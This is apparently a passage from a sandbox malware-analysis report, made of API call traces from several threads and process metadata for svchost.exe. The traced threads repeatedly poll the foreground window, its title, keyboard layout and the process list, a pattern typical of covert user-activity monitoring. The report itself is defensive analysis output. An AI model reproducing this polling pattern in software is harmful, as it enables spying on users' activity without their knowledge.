[0212.990] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0212.990] EnumProcesses (in: lpidProcess=0x266f8d8, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x266f8d8, lpcbNeeded=0x51cf97c) returned 1
[0212.997] GetLastError () returned 0x3e5
[0212.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x378fd70, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x378fd70, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0213.008] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0213.008] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.135] GetForegroundWindow () returned 0x2007c
[0213.135] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0213.135] EnumProcesses (in: lpidProcess=0x26954ec, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x26954ec, lpcbNeeded=0x51cf97c) returned 1
[0213.146] GetLastError () returned 0x3e5
[0213.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x37afd90, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x37afd90, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0213.161] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0213.162] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.272] GetForegroundWindow () returned 0x2007c
[0213.272] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.397] GetForegroundWindow () returned 0x2007c
[0213.398] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.531] GetForegroundWindow () returned 0x2007c
[0213.531] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.760] GetForegroundWindow () returned 0x100d4
[0213.761] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.973] GetForegroundWindow () returned 0x2007c
[0213.973] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.086] GetForegroundWindow () returned 0x2007c
[0214.086] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.209] GetForegroundWindow () returned 0x2007c
[0214.210] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.335] GetForegroundWindow () returned 0x2007c
[0214.335] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0215.478] GetForegroundWindow () returned 0x50032
[0215.497] GetWindowThreadProcessId (in: hWnd=0x50032, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0215.498] EnumProcesses (in: lpidProcess=0x256a6b0, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x256a6b0, lpcbNeeded=0x51cf97c) returned 1
[0215.507] GetLastError () returned 0x3e5
[0215.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x350e8c0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x350e8c0, ResultLength=0x51cf940*=0x17620) returned 0x0
[0215.520] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0215.520] GetWindowTextW (in: hWnd=0x50032, lpString=0x6979b8, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0215.985] GetForegroundWindow () returned 0x10316
[0215.985] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.116] GetForegroundWindow () returned 0x10316
[0216.116] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.300] GetForegroundWindow () returned 0x10316
[0216.301] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0218.601] GetForegroundWindow () returned 0x0
[0218.602] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0218.602] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.298] GetForegroundWindow () returned 0x0
[0219.299] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.585] GetForegroundWindow () returned 0x0
[0219.585] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.753] GetForegroundWindow () returned 0x0
[0219.753] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.936] GetForegroundWindow () returned 0x0
[0219.937] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0220.222] GetForegroundWindow () returned 0x0
[0220.222] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0221.712] GetForegroundWindow () returned 0x100d4
[0221.712] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 137
os_tid = 0x1d0
Thread:
id = 138
os_tid = 0x13f4
[0204.512] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.598] GetForegroundWindow () returned 0x2007c
[0204.600] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.601] GetForegroundWindow () returned 0x2007c
[0204.601] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.808] GetForegroundWindow () returned 0x2007c
[0204.808] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.810] GetForegroundWindow () returned 0x2007c
[0204.811] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.224] GetForegroundWindow () returned 0x100d4
[0205.224] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0205.224] EnumProcesses (in: lpidProcess=0x24e1b30, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x24e1b30, lpcbNeeded=0x556f8fc) returned 1
[0205.232] GetLastError () returned 0x0
[0205.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8a0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x34ee8a0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0205.240] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0205.240] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0205.415] GetForegroundWindow () returned 0x2007c
[0205.415] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.752] GetForegroundWindow () returned 0x2007c
[0205.752] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.926] GetForegroundWindow () returned 0x2007c
[0205.926] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x6ac
[0205.926] EnumProcesses (in: lpidProcess=0x256ca20, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x256ca20, lpcbNeeded=0x556f8fc) returned 1
[0205.928] GetLastError () returned 0x0
[0205.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x354e900, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x354e900, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0205.940] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0205.942] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0206.142] GetForegroundWindow () returned 0x2007c
[0206.142] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0206.384] GetForegroundWindow () returned 0x100d4
[0206.385] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0206.385] EnumProcesses (in: lpidProcess=0x25a02e8, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25a02e8, lpcbNeeded=0x556f8fc) returned 1
[0206.428] GetLastError () returned 0x0
[0206.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x356eb40, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x356eb40, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0206.606] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0206.607] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0207.102] GetForegroundWindow () returned 0x2007c
[0207.103] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0211.877] GetForegroundWindow () returned 0x2007c
[0211.878] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0211.990] GetForegroundWindow () returned 0x2007c
[0211.990] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.131] GetForegroundWindow () returned 0x2007c
[0212.132] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.281] GetForegroundWindow () returned 0x100d4
[0212.282] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0212.429] GetForegroundWindow () returned 0x2007c
[0212.429] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.605] GetForegroundWindow () returned 0x2007c
[0212.606] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.733] GetForegroundWindow () returned 0x2007c
[0212.733] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.933] GetForegroundWindow () returned 0x2007c
[0212.933] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.067] GetForegroundWindow () returned 0x100d4
[0213.068] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.215] GetForegroundWindow () returned 0x2007c
[0213.215] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.335] GetForegroundWindow () returned 0x2007c
[0213.335] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.459] GetForegroundWindow () returned 0x2007c
[0213.459] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.583] GetForegroundWindow () returned 0x2007c
[0213.583] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.647] GetForegroundWindow () returned 0x100d4
[0213.647] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0213.648] EnumProcesses (in: lpidProcess=0x26bbe10, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x26bbe10, lpcbNeeded=0x556f8fc) returned 1
[0213.660] GetLastError () returned 0x0
[0213.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3476de0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x3476de0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0213.714] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0213.716] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.821] GetForegroundWindow () returned 0x2007c
[0213.821] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x6ac
[0213.822] EnumProcesses (in: lpidProcess=0x251e6ac, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x251e6ac, lpcbNeeded=0x556f8fc) returned 1
[0213.829] GetLastError () returned 0x1e7
[0213.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3496e00, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x3496e00, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0213.838] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0213.839] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.025] GetForegroundWindow () returned 0x2007c
[0214.025] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.146] GetForegroundWindow () returned 0x2007c
[0214.146] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.272] GetForegroundWindow () returned 0x2007c
[0214.273] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.399] GetForegroundWindow () returned 0x100d4
[0214.399] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0214.399] EnumProcesses (in: lpidProcess=0x2544edc, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x2544edc, lpcbNeeded=0x556f8fc) returned 1
[0214.521] GetLastError () returned 0x1e7
[0214.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8a0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x34ee8a0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0214.532] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0214.532] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0215.787] GetForegroundWindow () returned 0x10316
[0215.787] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x1298
[0215.787] EnumProcesses (in: lpidProcess=0x25904c8, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25904c8, lpcbNeeded=0x556f8fc) returned 1
[0215.803] GetLastError () returned 0x1e7
[0215.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x352e8e0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x352e8e0, ResultLength=0x556f8c0*=0x17620) returned 0x0
[0215.818] GetKeyboardLayout (idThread=0x1298) returned 0x4090409
[0215.818] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.058] GetForegroundWindow () returned 0x10316
[0216.058] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.227] GetForegroundWindow () returned 0x10316
[0216.227] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.411] GetForegroundWindow () returned 0x10316
[0216.411] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0219.032] GetForegroundWindow () returned 0x0
[0219.032] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.447] GetForegroundWindow () returned 0x0
[0219.447] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.648] GetForegroundWindow () returned 0x0
[0219.648] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.846] GetForegroundWindow () returned 0x0
[0219.846] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0220.084] GetForegroundWindow () returned 0x0
[0220.084] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0221.371] GetForegroundWindow () returned 0x100d4
[0221.371] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0221.371] EnumProcesses (in: lpidProcess=0x25ba50c, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25ba50c, lpcbNeeded=0x556f8fc) returned 1
[0221.387] GetLastError () returned 0x578
[0221.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x354e900, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x354e900, ResultLength=0x556f8c0*=0x11c38) returned 0x0
[0221.403] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0221.404] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 139
os_tid = 0xa24
[0204.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.644] GetForegroundWindow () returned 0x2007c
[0204.644] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.119] GetForegroundWindow () returned 0x2007c
[0207.121] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.312] GetForegroundWindow () returned 0x2007c
[0207.313] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.671] GetForegroundWindow () returned 0x2007c
[0207.671] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x56af8c4 | out: lpdwProcessId=0x56af8c4) returned 0x6ac
[0207.671] EnumProcesses (in: lpidProcess=0x2616424, cb=0x400, lpcbNeeded=0x56af87c | out: lpidProcess=0x2616424, lpcbNeeded=0x56af87c) returned 1
[0207.678] GetLastError () returned 0x0
[0207.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35ceba0, Length=0x20000, ResultLength=0x56af840 | out: SystemInformation=0x35ceba0, ResultLength=0x56af840*=0x174e0) returned 0x0
[0207.691] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0207.691] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0208.930] GetForegroundWindow () returned 0x100d4
[0208.930] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x56af8c4 | out: lpdwProcessId=0x56af8c4) returned 0x668
[0208.930] EnumProcesses (in: lpidProcess=0x2536644, cb=0x400, lpcbNeeded=0x56af87c | out: lpidProcess=0x2536644, lpcbNeeded=0x56af87c) returned 1
[0208.934] GetLastError () returned 0x0
[0208.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x366fc50, Length=0x20000, ResultLength=0x56af840 | out: SystemInformation=0x366fc50, ResultLength=0x56af840*=0x174e0) returned 0x0
[0208.959] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.960] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
[0209.142] GetForegroundWindow () returned 0x2007c
[0209.150] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0209.321] GetForegroundWindow () returned 0x2007c
[0209.321] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0209.420] GetForegroundWindow () returned 0x2007c
[0209.424] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.142] GetForegroundWindow () returned 0x2007c
[0210.143] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.591] GetForegroundWindow () returned 0x100d4
[0210.591] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
[0210.750] GetForegroundWindow () returned 0x2007c
[0210.750] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.928] GetForegroundWindow () returned 0x2007c
[0210.928] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.111] GetForegroundWindow () returned 0x2007c
[0211.111] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.403] GetForegroundWindow () returned 0x2007c
[0211.403] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.633] GetForegroundWindow () returned 0x100d4
[0211.634] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 140
os_tid = 0xd98
[0204.647] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.652] GetForegroundWindow () returned 0x2007c
[0204.653] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.095] GetForegroundWindow () returned 0x2007c
[0207.098] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.731] GetForegroundWindow () returned 0x2007c
[0207.732] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.877] GetForegroundWindow () returned 0x2007c
[0207.877] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0208.037] GetForegroundWindow () returned 0x100d4
[0208.037] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0208.038] EnumProcesses (in: lpidProcess=0x263dde0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x263dde0, lpcbNeeded=0x58ef7fc) returned 1
[0208.051] GetLastError () returned 0x0
[0208.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35eebc0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x35eebc0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0208.175] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.183] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0208.385] GetForegroundWindow () returned 0x2007c
[0208.386] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0208.589] GetForegroundWindow () returned 0x2007c
[0208.589] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0209.249] GetForegroundWindow () returned 0x2007c
[0209.284] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.058] GetForegroundWindow () returned 0x2007c
[0210.058] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.498] GetForegroundWindow () returned 0x100d4
[0210.498] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0210.498] EnumProcesses (in: lpidProcess=0x25871f0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25871f0, lpcbNeeded=0x58ef7fc) returned 1
[0210.514] GetLastError () returned 0x0
[0210.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36cfcb0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x36cfcb0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0210.537] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0210.538] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0210.650] GetForegroundWindow () returned 0x2007c
[0210.650] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x6ac
[0210.650] EnumProcesses (in: lpidProcess=0x25acd24, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25acd24, lpcbNeeded=0x58ef7fc) returned 1
[0210.657] GetLastError () returned 0x0
[0210.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36efcd0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x36efcd0, ResultLength=0x58ef7c0*=0x17520) returned 0x0
[0210.670] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0210.671] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.853] GetForegroundWindow () returned 0x2007c
[0210.853] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.022] GetForegroundWindow () returned 0x2007c
[0211.022] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.198] GetForegroundWindow () returned 0x2007c
[0211.198] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.465] GetForegroundWindow () returned 0x100d4
[0211.465] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0211.466] EnumProcesses (in: lpidProcess=0x25d71e8, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25d71e8, lpcbNeeded=0x58ef7fc) returned 1
[0211.477] GetLastError () returned 0x0
[0211.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370fcf0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x370fcf0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0211.595] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0211.597] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0211.727] GetForegroundWindow () returned 0x2007c
[0211.741] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x6ac
[0211.744] EnumProcesses (in: lpidProcess=0x25fd2d0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25fd2d0, lpcbNeeded=0x58ef7fc) returned 1
[0211.768] GetLastError () returned 0x0
[0211.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x372fd10, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x372fd10, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0211.793] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0211.794] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
Thread:
id = 141
os_tid = 0xde0
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x757f8000"
os_pid = "0x370"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "4"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bf3c" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1662
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
